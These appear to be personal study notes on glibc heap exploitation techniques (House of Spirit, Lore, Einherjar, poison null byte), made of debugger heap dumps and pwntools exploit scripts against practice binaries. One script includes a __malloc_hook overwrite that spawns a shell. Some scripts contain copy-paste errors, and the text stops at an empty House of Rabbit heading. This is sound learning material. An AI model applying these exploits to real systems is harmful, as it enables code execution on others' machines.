[On-Going] Fine, I'll Learn More Heap Exploitation

2025-01-02

Table of Contents

  1. House of Spirit
  2. House of Lore
  3. House of Einherjar
  4. Google poison Null Byte
  5. House of Rabbit

House of Spirit (libc < 2.30)

This exploit revolves around corrupting a pointer that is eventually passed to the free function, enabling arbitrary writes. Below is the analysis and step-by-step breakdown.

pwndbg> vis

0x603000        0x0000000000000000      0x0000000000000021      ........!.......
0x603010        0x5a5a5a5a5a5a5a5a      0x5a5a5a5a5a5a5a5a      ZZZZZZZZZZZZZZZZ
0x603020        0x0a5a5a5a5a5a5a5a      0x0000000000020fe1      ZZZZZZZ......... <-- Top chunk
pwndbg> p m_arry
No symbol "m_arry" in current context.
pwndbg> f 2
#2  0x000000000040096b in main (argc=1, argv=0x7fffffffdd78) at pwnable_house_of_spirit.c:65
warning: 65     pwnable_house_of_spirit.c: No such file or directory
pwndbg> ptype m_array
type = struct chunk {
    char name[8];
    char *ptr;
} [8]

Pointer setup:

pwndbg> p m_array
$1 = {{
    name = "AAAA\n\000\000",
    ptr = 0x603010 'Z' <repeats 23 times>, "\n\341\017\002"
  }, {
    name = "\000\000\000\000\000\000\000",
    ptr = 0x0

Target structure for arbitrary write:

pwndbg> ptype user
type = struct user {
    unsigned long unused_0;
    unsigned long age;
    char unused_1[64];
    char target[16];
    char unused_2[16];
    char username[64];
}

The stack overflow allows overwriting the ptr field in m_array[0], which is later used in a free operation.

pwndbg> p m_array[0]
$1 = {
  name = "VVVVVVVV",
  ptr = 0x5656565656565656 <error: Cannot access memory at address 0x5656565656565656>
}

Potential issues with the size flags:

0x6f = IS_MAPPED is the problem
> malloc_chunk &user
PREV_INUSE | IS_MMAPED | NON_MAIN_ARENA
Addr: 0x602010
Size: 0x68 (with flag bits: 0x6f)


0x6d = NON_MAIN_ARENA is the problem.
> malloc_chunk &user
PREV_INUSE | NON_MAIN_ARENA
Addr: 0x602010
Size: 0x68 (with flag bits: 0x6d)

0x69 = fails aligned_OK
if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
    malloc_printerr ("free(): invalid size");

0x61 = fails at av->system_mem
as the next chunk is 0

The final setup for everything

> dq &user 22
0000000000602010   A[0000000000000000 0000000000000081 <- Fake int
0000000000602020     0000000000000000 0000000000000000
0000000000602030     0000000000000000 0000000000000000
0000000000602040     0000000000000000 0000000000000000
0000000000602050     0000000000000000 0000000000000000
0000000000602060     0058585858585858 0000000000000000
0000000000602070     0000000000000000 0000000000000000
0000000000602080     0000000000000000 0000000000000000
0000000000602090     0000000000000000]0000000000020fff <- Next chunk size field.
00000000006020a0     0000000000000000 0000000000000000
00000000006020b0     0000000000000000 0000000000000000

> fastbins
0x80: 0x602010 (user) ◂— 0
# Set the "age" field.
age = 0x81
io.sendafter(b"age: ", f"{age}".encode())

# Set the "username" field.
username = p64(0x00) *3 + p64(0x20fff)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")

# Fill it with data and name it.
name = b"A" * 8 + p64(elf.sym.user + 0x10)
chunk_A = malloc(0x18, b"Y" * 0x18, name)

free (chunk_A)

chunk_B = malloc(0x78, b"Z"*64 + b'Pwned!!',"B")


io.interactive()

Unsorted bin Perspective

# Set the "age" field.
age = 0x91
io.sendafter(b"age: ", f"{age}".encode())

# Set the "username" field.
username = p64(0x00) * 5 + p64(0x11) + p64(0) + p64(0x01)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")

# Fill it with data and name it.
name = b"A" * 8 + p64(elf.sym.user + 0x10)
chunk_A = malloc(0x18, b"Y" * 0x18, name)

free (chunk_A)

chunk_B = malloc(0x88, b"Z"*64 + b'Pwned!!',"B")


io.interactive()
pwndbg> dq &user 22
0000000000602010     0000000000000000 0000000000000091
0000000000602020     5a5a5a5a5a5a5a5a 5a5a5a5a5a5a5a5a
0000000000602030     5a5a5a5a5a5a5a5a 5a5a5a5a5a5a5a5a
0000000000602040     5a5a5a5a5a5a5a5a 5a5a5a5a5a5a5a5a
0000000000602050     5a5a5a5a5a5a5a5a 5a5a5a5a5a5a5a5a
0000000000602060     00212164656e7750 0000000000000000
0000000000602070     0000000000000000 0000000000000000
0000000000602080     0000000000000000 0000000000000000
0000000000602090     0000000000000000 0000000000000000
00000000006020a0     0000000000000090 0000000000000011
00000000006020b0     0000000000000000 0000000000000001

Code Execution

Constraints:

  1. Fastbin Size Range: Ensure target size fits within fastbin range.
  2. Flag Management: Avoid IS_MAPPED or NON_MAIN_ARENA in the size field.
  3. Alignment: Ensure 16-byte alignment.
  4. Valid Metadata: Maintain valid succeeding size fields to bypass checks.

what we need to bypass:

if (__builtin_expect (contiguous (av)
    && (char *) nextchunk
    >= ((char *) av->top + chunksize(av->top)), 0))
    malloc_printerr ("double free or corruption (out)");

Use a double free (fastbin dup)

# Set the "age" field.
age = 0x91
io.sendafter(b"age: ", f"{age}".encode())

# Set the "username" field.
username = p64(0x00) * 5 + p64(0x11) + p64(0) + p64(0x01)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")

# Fill it with data and name it.

chunk_A = malloc(0x68, b"A" * 0x08, b"A" * 0x08)
chunk_B = malloc(0x68, b"B" * 0x08, b"B" * 0x08)
chunk_C = malloc(0x18, b"Y" * 0x18, b"C" * 0x08 + p64(heap + 0x10) )

free (chunk_A)
free (chunk_B)
free (chunk_C)

malicious = malloc(0x68, p64(libc.sym.__malloc_hook - 35), "C"*8)
chunk_D = malloc(0x68, b"D" * 0x08, b"A" * 0x08)
chunk_E = malloc(0x68, b"E" * 0x08, b"B" * 0x08)

'''
0xe1fa1 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL || {[rsp+0x50], [rsp+0x58], [rsp+0x60], [rsp+0x68], ...} is a valid argv
'''
chunk_user = malloc(0x68,b"X"*0x13 + p64(libc.address + 0xe1fa1), "F"*8)

malloc(1,b"",b"")

io.interactive()

Takeaways

Power and Control: Exploit requires precise control over the pointer passed to free. Size Field Validity: The size field must avoid critical flags like IS_MAPPED. Double-Free Strategy: Leveraging fastbin dup for arbitrary writes is critical to achieve exploitation.

House of Lore (Libc <2.28 )

This write-up explores a Use-After-Free (UAF) vulnerability leading to exploitation via the unsorted bin. Specifically, we demonstrate how to craft a write primitive by leveraging the unsorted bin’s bk pointer.

  1. Read-After-free
  2. Write-after-free <- example flaw
  3. Call-after-free

Usortedbin Variant

Consider the following heap layout. We have control over metadata of a freed chunk:

0x603000        0x0000000000000000      0x0000000000000091      ................  <-- unsortedbin[all][0]
0x603010        0x5959595959595959      0x5a5a5a5a5a5a5a5a      YYYYYYYYZZZZZZZZ
0x603020        0x000000000000000a      0x0000000000000000      ................
0x603030        0x0000000000000000      0x0000000000000000      ................
0x603040        0x0000000000000000      0x0000000000000000      ................
0x603050        0x0000000000000000      0x0000000000000000      ................
0x603060        0x0000000000000000      0x0000000000000000      ................
0x603070        0x0000000000000000      0x0000000000000000      ................
0x603080        0x0000000000000000      0x0000000000000000      ................
0x603090        0x0000000000000090      0x0000000000000090      ................
0x6030a0        0x0000000000000000      0x0000000000020f61      ........a.......
0x6030b0        0x0000000000000000      0x0000000000000000      ................
0x6030c0        0x0000000000000000      0x0000000000000000      ................
0x6030d0        0x0000000000000000      0x0000000000000000      ................
0x6030e0        0x0000000000000000      0x0000000000000000      ................
0x6030f0        0x0000000000000000      0x0000000000000000      ................
0x603100        0x0000000000000000      0x0000000000000000      ................
0x603110        0x0000000000000000      0x0000000000000000      ................
0x603120        0x0000000000000000      0x0000000000020ee1      ................  <-- Top chunk

Using the write-after-free vulnerability, we overwrite the bk pointer of a chunk in the unsorted bin to point to a controlled location:

0x24918000      0x0000000000000000      0x00000000000000a1      ................  <-- unsortedbin[all][0]
0x24918010      0x0000000000000000      0x0000000000602010      ......... `.....
0x24918020      0x0000000000000000      0x0000000000000000      ................
0x24918030      0x0000000000000000      0x0000000000000000      ................

Now that we have exploited the “write-after-free”, malloc will search the unsorted bin from back to front and conduct a partial unlink.

Before malloc

pwndbg> unsortedbin 
unsortedbin
all [corrupted]
FD: 0x24918000 ◂— 0
BK: 0x24918000 —▸ 0x602010 (user) ◂— 0

When malloc allocates the chunk, it processes the unsorted bin using the partial unlink process. The corrupted bk pointer is used to adjust heap structures.

After malloc:

pwndbg> unsortedbin 
unsortedbin
all [corrupted]
FD: 0x24918000 ◂— 0
BK: 0x602010 (user) ◂— 0

The bk the pointer now points to the target memory location where we want to write. The target memory location is now accessible for writing:

0000000000602010     00006567726f6547 0000000000000000  <-- overflow "username", then need valid size field.
0000000000602020     00007f96be597b58 0000000000000000  <-- main arena fd
0000000000602030     0000000000000000 0000000000000000
0000000000602040     0058585858585858 0000000000000000  <-- Target 
0000000000602050     0000000000000000 0000000000000000

The unsorted bin now looks like;

unsortedbin

all [corrupted]
FD: 0x25ecb000 ◂— 0
BK: 0x602010 (user) —▸ 0x602000 (data_start) ◂— 0xe1

Final script for the write primitive:

'''
e1 = size field
p64(0) = fake `fd` that will be overwritten
p64(elf..) = bk to not cause exploit mitigations on partial unlink. 
'''
username = p64(0) + p64(0xe1) + p64(0) + p64(elf.sym.user - 16)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")

# Request 2 "normal" chunks.
chunk_A = malloc(0x98)
chunk_B = malloc(0x88)

# Free the first chunk into the unsortedbin.
free(chunk_A)

# Overwrite the bk of the free'd chunk.
edit (chunk_A, p64(0) + p64(elf.sym.user))

# Will cause the partial unlink AND then search the unsorted bin 
# triggering the exploit
unsorted_bin_attack = malloc(0xd8)

# Overwrite our .data
edit(unsorted_bin_attack, p64(0)*4 + b"Pwned!\0")

Interesting Notes:

  1. Alignment Flexibility: Fake chunks can be misaligned, unlike fast bins.
  2. Flags: You can use invalid flags in the size field without causing immediate crashes.
  3. Recursive Exploitation: Pointing bk to another fake chunk or the chunk itself allows for multiple free operations.

Takeaways

Size sanity checks are important with this attack. Fake chunks bk must hold writable memory too.

Smallbins Variant

New concepts being introduced;

  • Doubly Linked List
  • Circular
  • 0x20 - 0x3f0 (overlapping fastbin)
  • First in, first out

Small variation as unsorted bin, but there’s an extra constraint. When allocating our fake chunk ,the victim bk on the free is followed, and checks that the fd points to the victim. This is one part of the safe unblinking check. This means you will need a heap leak to exploit this fully, in this case we do, so update script accordingly.

# Populate the "username" field.
username = p64(elf.sym.user) + p64(0xdeadbeef) + p64(heap) + p64(elf.sym.user - 16)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")

# Request 2 "normal" chunks.
chunk_A = malloc(0x98)
chunk_B = malloc(0x88)

# Edit the first chunk.
edit(chunk_A, b"Y"*8)

# Free the first chunk into the unsortedbin.
free(chunk_A)
malloc(0xa8)

# Overwrite the bk of the free'd chunk.
edit (chunk_A, p64(0) + p64(elf.sym.user))

small_bin_attack = malloc(0x98)

# Allocate our fake chunk
small_bin_attack = malloc(0x98)

edit(unsorted_bin_attack, p64(0)*4 + b"Pwned!\0")

visualized heap

pwndbg> vis
0x2010f000      0x0000000000000000      0x00000000000000a1      ................  <-- smallbins[0xa0][0]
0x2010f010      0x0000000000000000      0x0000000000602010      ......... `.....
0x2010f020      0x0000000000000000      0x0000000000000000      ................
[ ... ]
0x2010f120      0x0000000000000000      0x0000000000000000      ................
0x2010f130      0x0000000000000000      0x00000000000000b1      ................
0x2010f140      0x0000000000000000      0x0000000000000000      ................
[ ... ]
0x2010f1d0      0x0000000000000000      0x0000000000000000      ................
0x2010f1e0      0x0000000000000000      0x0000000000020e21      ........!.......  <-- Top chunk

pwndbg> dq &user
0000000000602010     0000000000602010 00000000deadbeef
0000000000602020     000000002010f000 0000000000602000
0000000000602030     0000000000000000 0000000000000000
0000000000602040     0058585858585858 0000000000000000

Takeaways

point it to a fake chunk we prepared allocated the chunk from tail of smallbin our fake fd pointed to our chunk (paritial unlink) allocated the smallbin fake chunk fake chunk partial unlink check, by point bk to a fd back to use, no size field integrity chunk You can use misaligned chunks. need heap link.

Largebins Variant

  • Structure: Doubly linked, circular.
  • Size Range: 0x400 and above.
    • Holds a range of sizes:
      • 0x400 => 0x410, 0x420, 0x430
      • 0x440 => 0x450, 0x460, 0x470
    • Maximum size: 0x80000 (no upper limit).

hold a range of sizes 0x400 => 0x410, 0x420, 0x430 0x440 => 0x450, 0x460, 0x470 Max 0x80000 no upp limit

Uses skips list:

  • Chunks are sorted in reverse order.
  • The first chunk of each size points to the next size, skipping over chunks of the same size.
  • If a size has only one chunk, it automatically becomes the skip chunk.
  • Newly freed chunks are added to the head of the skip chunks.
  • Head skip chunks are allocated last.

Which list should we target? The answer is either. Normal fd attack on LargeBins.

Allocation routine flow malloc:

/* Avoid removing the first entry for a size so that the skip
list does not have to be rerouted.  */
if (victim != last (bin)
    && chunksize_nomask (victim)
      == chunksize_nomask (victim->fd))
        victim = victim->fd;

  remainder_size = size - nb;
  unlink (av, victim, bck, fwd);

Our fake chunk setup

dq &user
0000000000602010     0000000000000000 0000000000000401
0000000000602020     0000000000602010 0000000000602010
0000000000602030     0000000000000000 0000000000000000
0000000000602040     0058585858585858 0000000000000000

Final exploit

username = p64(0) + p64(0x401) + p64(elf.sym.user) + p64(elf.sym.user)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")

# Request 2 large chunks.
chunk_A = malloc(0x3f8)
malloc(0x88)
chunk_B = malloc(0x3f8)
malloc(0x88)

# Free the first chunk into the unsortedbin.
free(chunk_A)
free(chunk_B)

# right now they are in unsorted
# trigger unsorted bin search
malloc(0x408)
# Overwrite the bk of the free'd chunk.

edit(chunk_A, p64(elf.sym.user) )

chunk_C = malloc(0x3f8)

edit(chunk_C, p64(0)*4 + b"Pwned!\0")

io.interactive()

Takeaways

  1. An accurate size field is crucial.
  2. Overwriting next-size pointers is also necessary.

Overall

The house of Lore is used mostly to create fake chunks to overlap sensitive data.

House of Einherjar ( < 2.28 )

0x603000        0x0000000000000000      0x0000000000000091      ................  <-- unsortedbin[all][0]
0x603010        0x00007ffff7bafc80      0x00007ffff7bafc80      ................
0x603020        0x0000000000000000      0x0000000000000000      ................
0x603030        0x0000000000000000      0x0000000000000000      ................
0x603040        0x0000000000000000      0x0000000000000000      ................
0x603050        0x0000000000000000      0x0000000000000000      ................
0x603060        0x0000000000000000      0x0000000000000000      ................

ptype user
type = struct user {
    char username[32];
    char target[16];
}

pwndbg> dq &user
0000000000602010     4141414141414141 0a41414141414141
0000000000602020     0000000000000000 0000000000000000
0000000000602030     0058585858585858 0000000000000000
0000000000602040     0000000000000000 0000000000000000

The bug: Single byte overflow

pwndbg> vis
0x603000        0x0000000000000000      0x0000000000000091      ................
0x603010        0x4141414141414141      0x4141414141414141      AAAAAAAAAAAAAAAA
0x603020        0x4141414141414141      0x4141414141414141      AAAAAAAAAAAAAAAA
0x603030        0x4141414141414141      0x4141414141414141      AAAAAAAAAAAAAAAA
0x603040        0x4141414141414141      0x4141414141414141      AAAAAAAAAAAAAAAA
0x603050        0x4141414141414141      0x4141414141414141      AAAAAAAAAAAAAAAA
0x603060        0x4141414141414141      0x4141414141414141      AAAAAAAAAAAAAAAA
0x603070        0x4141414141414141      0x4141414141414141      AAAAAAAAAAAAAAAA
0x603080        0x4141414141414141      0x4141414141414141      AAAAAAAAAAAAAAAA
0x603090        0x0a41414141414141      0x0000000000020f00      AAAAAAA.........  <-- Top chunk

Targeting the top chunk alone may not yield significant results. However, overflowing an adjacent allocated or free chunk could provide potential advantages. We should target a Large bins.

0x603000        0x0000000000000000      0x0000000000000101      ................
0x603010        0x0000000000000000      0x0000000000000000      ................
0x603020        0x0000000000000000      0x0000000000000000      ................

As we cann see it will clear the PREV_INUSE flag on an allocated chunk. Simple pass the safe unlinking just to allocate our fake chunk over our target. What this looks like:

0xb3ed000       0x0000000000000000      0x0000000000000091      ................
0xb3ed010       0x5858585858585858      0x5858585858585858      XXXXXXXXXXXXXXXX
[ ... ]
0xb3ed080       0x5858585858585858      0x5858585858585858      XXXXXXXXXXXXXXXX
0xb3ed090       0x00000000deadbeef      0x0000000000000100      ................
0xb3ed0a0       0x0000000000000000      0x0000000000000000      ................
[ ... ]
0xb3ed190       0x0000000000000000      0x0000000000020e71      ........q.......  <-- Top chunk

Go after the unlinking process, by creating a fake chunk.

# Populate the username field.
username = p64(0) + p64(0x31) + p64(elf.sym.user)+ p64(elf.sym.user)
io.sendafter(b"username: ", username)

# This program leaks its default heap start address.
io.recvuntil(b"heap @ ")
heap = int(io.recvline(), 16)
io.recvuntil(b"> ")

# Request 2 chunks.
chunk_A = malloc(0x88)
chunk_B = malloc(0xf8)

# Trigger the single NULL byte overflow with fake chunk
prev_size = (heap + 0x90) - elf.sym.user
edit(chunk_A, b"X"*0x80 + p64(prev_size))

When freeing chunk B, malloc attempts to consolidate backward because the PREV_INUSE flag is cleared. It reads the PREV_SIZE field (0x0000000000001080) and subtracts this value from the chunk’s address (0x603090), resulting in 0x602010. This calculation points directly to the fake chunk we prepared in the data section.

vis

0x603000        0x0000000000000000      0x0000000000000091      ................
0x603010        0x5858585858585858      0x5858585858585858      XXXXXXXXXXXXXXXX
[ ... ]
0x603080        0x5858585858585858      0x5858585858585858      XXXXXXXXXXXXXXXX
0x603090        0x0000000000001080      0x0000000000000100      ................
0x6030a0        0x0000000000000000      0x0000000000000000      ................
[ ... ]
0x603190        0x0000000000000000      0x0000000000020e71      ........q.......         <-- Top chunk

pwndbg> vis 0x0000000000602010 
0x602010        0x0000000000000000      0x0000000000000031      ........1.......
0x602020        0x0000000000602010      0x0000000000602010      . `...... `.....
0x602030        0x0058585858585858      0x0000000000000000      XXXXXXX.........

Don’t forget about corrupted size vs. prev_size mitigation.

  /* Take a chunk off a bin list */
  #define unlink(AV, P, BK, FD) {
      if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))
        malloc_printerr ("corrupted size vs. prev_size");
      FD = P->fd;
      BK = P->bk;
      if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
        malloc_printerr ("corrupted double-linked list");
      else {

When malloc reaches our chunk, it reads the size field and uses it to calculate the next address. In a normal scenario, this address would lead back to the victim chunk, as malloc had previously subtracted the prev_size field to reach the current chunk.

However, in this case, the process goes 0x31 bytes forward and returns the size field, which does not match the the pre_size field of the fake chunk. This discrepancy triggers the exploit mitigation. The vulnerability lies in our ability to control the size field. By adjusting it to include an offset of 8, we can make it point back to itself, bypassing the mitigation. The root, is that it does not compare the size_field of the victim chunk, but rather the size_field it read from our fake chunk.

This leads to the final exploit, which allows for a write primitive.


# Populate the username field.
username = p64(0) + p64(0x8) + p64(elf.sym.user)+ p64(elf.sym.user)
io.sendafter(b"username: ", username)

# This program leaks its default heap start address.
io.recvuntil(b"heap @ ")
heap = int(io.recvline(), 16)
io.recvuntil(b"> ")

# Request 2 chunks.
chunk_A = malloc(0x88)
chunk_B = malloc(0xf8)

# Trigger the single NULL byte overflow with fake chunk
prev_size = (heap + 0x90) - elf.sym.user
edit(chunk_A, b"X"*0x80 + p64(prev_size))

free(chunk_B)
a = malloc(0x88)
edit(a, p64(0) *2 + b"Pwned!\0")

Takeaways

  1. Clear the PREV_INUSE flag to allow backward consolidation.
  2. Provide a bogus prev_size value that points from the victim chunk to the fake chunk elsewhere in memory.
  3. Free a chunk to trigger backward consolidation.
    • During this process, the allocator consolidates the free chunk with the fake chunk and bypasses safe unlinking checks.
  4. Ensure the fd and bk pointers in the fake chunk point back to itself to survive unlinking.
  5. Bypass the size vs. prev_size check (introduced as mitigation in version 2.26 and updated in 2.29) by crafting the fake chunk’s size field to always pass validation.
  6. Make an additional malloc call to overwrite the target data section, achieving the desired write primitive.

Google Poison Null Byte Technique

Creating overlapping heap chunks.

  • Target free chuink size field
vis                                                                                                                               

0x603000        0x0000000000000000   A[ 0x0000000000000021      ........!.......
0x603010        0x0000000000000000      0x0000000000000000      ................
0x603020        0x0000000000000000 ] B[ 0x0000000000000211      ................         <-- unsortedbin[all][0]
0x603030        0x00007ffff7b97b58      0x00007ffff7b97b58      X{......X{......
0x603040        0x0000000000000000      0x0000000000000000      ................
0x603050        0x0000000000000000      0x0000000000000000      ................
0x603060        0x0000000000000000      0x0000000000000000      ................
0x603070        0x0000000000000000      0x0000000000000000      ................
0x603080        0x0000000000000000      0x0000000000000000      ................
0x603090        0x0000000000000000      0x0000000000000000      ................
0x6030a0        0x0000000000000000      0x0000000000000000      ................
0x6030b0        0x0000000000000000      0x0000000000000000      ................
0x6030c0        0x0000000000000000      0x0000000000000000      ................
0x6030d0        0x0000000000000000      0x0000000000000000      ................
0x6030e0        0x0000000000000000      0x0000000000000000      ................
0x6030f0        0x0000000000000000      0x0000000000000000      ................
0x603100        0x0000000000000000      0x0000000000000000      ................
0x603110        0x0000000000000000      0x0000000000000000      ................
0x603120        0x0000000000000000      0x0000000000000000      ................
0x603130        0x0000000000000000      0x0000000000000000      ................
0x603140        0x0000000000000000      0x0000000000000000      ................
0x603150        0x0000000000000000      0x0000000000000000      ................
0x603160        0x0000000000000000      0x0000000000000000      ................
0x603170        0x0000000000000000      0x0000000000000000      ................
0x603180        0x0000000000000000      0x0000000000000000      ................
0x603190        0x0000000000000000      0x0000000000000000      ................
0x6031a0        0x0000000000000000      0x0000000000000000      ................
0x6031b0        0x0000000000000000      0x0000000000000000      ................
0x6031c0        0x0000000000000000      0x0000000000000000      ................
0x6031d0        0x0000000000000000      0x0000000000000000      ................
0x6031e0        0x0000000000000000      0x0000000000000000      ................
0x6031f0        0x0000000000000000      0x0000000000000000      ................
0x603200        0x0000000000000000      0x0000000000000000      ................
0x603210        0x0000000000000000      0x0000000000000000      ................
0x603220        0x0000000000000000      0x0000000000000000      ................
0x603230        0x0000000000000210 ] C[ 0x0000000000000090      ................
0x603240        0x0000000000000000      0x0000000000000000      ................
0x603250        0x0000000000000000      0x0000000000000000      ................
0x603260        0x0000000000000000      0x0000000000000000      ................
0x603270        0x0000000000000000      0x0000000000000000      ................
0x603280        0x0000000000000000      0x0000000000000000      ................
0x603290        0x0000000000000000      0x0000000000000000      ................
0x6032a0        0x0000000000000000      0x0000000000000000      ................
0x6032b0        0x0000000000000000      0x0000000000000000      ................
0x6032c0        0x0000000000000000 ]    0x0000000000000021      ........!.......
0x6032d0        0x0000000000000000      0x0000000000000000      ................
0x6032e0        0x0000000000000000      0x0000000000020d21      ........!.......         <-- Top chunk

overflow succcessful!

vis                                                                                                                               

0x603000        0x0000000000000000      0x0000000000000021      ........!.......
0x603010        0x4141414141414141      0x4141414141414141      AAAAAAAAAAAAAAAA
0x603020        0x4141414141414141      0x0000000000000200      AAAAAAAA........         <-- unsortedbin[all][0] !!
0x603030        0x00007ffff7b97b58      0x00007ffff7b97b58      X{......X{......
0x603040        0x0000000000000000      0x0000000000000000      ................
0x603050        0x0000000000000000      0x0000000000000000      ................
0x603060        0x0000000000000000      0x0000000000000000      ................
0x603070        0x0000000000000000      0x0000000000000000      ................

remaindering process executed incorrectly, because we overwrote the size field.

dq 0x603220
0000000000603220     0000000000000100 0000000000000000
0000000000603230     0000000000000210 0000000000000090
0000000000603240     0000000000000000 0000000000000000
0000000000603250     0000000000000000 0000000000000000
# Request 2 chunks.
chunk_A = malloc(0x18)
chunk_B = malloc(0x208)
chunk_C = malloc(0x88)
malloc(0x18) #Guard Rail

free(chunk_B)

edit(chunk_A, b"A"*0x18 + p8(0))

chunk_b1 = malloc(0xf8)
chunk_b2 = malloc(0xf8)

free(chunk_b1)
free(chunk_C)

Takeaways

no leaks needed

House of Rabbit